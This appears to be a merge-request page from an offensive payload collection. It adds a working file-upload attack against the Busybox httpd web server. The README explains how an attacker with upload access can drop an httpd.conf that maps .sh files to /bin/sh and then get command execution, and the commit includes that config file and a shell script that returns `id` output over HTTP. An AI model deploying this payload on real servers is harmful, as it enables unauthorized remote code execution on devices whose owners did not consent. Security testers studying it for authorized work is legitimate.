Merge pull request #32 from Meatballs1/Meatballs1-patch-1

Busybox httpd.conf file upload payload
2018-12-14 10:25:04 +03:00 · 2018-12-14 10:25:04 +03:00 · 8403068681
parent 68325c8b98 20c6bb2299
commit 8403068681
3 changed files with 15 additions and 0 deletions
--- a/httpd.conf/README.md
+++ b/httpd.conf/README.md
@ -0,0 +1,11 @@
+If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter.
+
+Details from Busybox httpd.c
+
+https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60
+
+> *.php:/path/php   # run xxx.php through an interpreter`
+
+>  If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration.
+
+Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :)  
--- a/httpd.conf/httpd.conf
+++ b/httpd.conf/httpd.conf
@ -0,0 +1 @@
+*.sh:/bin/sh
--- a/httpd.conf/shellymcshellface.sh
+++ b/httpd.conf/shellymcshellface.sh
@ -0,0 +1,3 @@
+echo "Content-type: text/html"
+echo ""
+echo `id`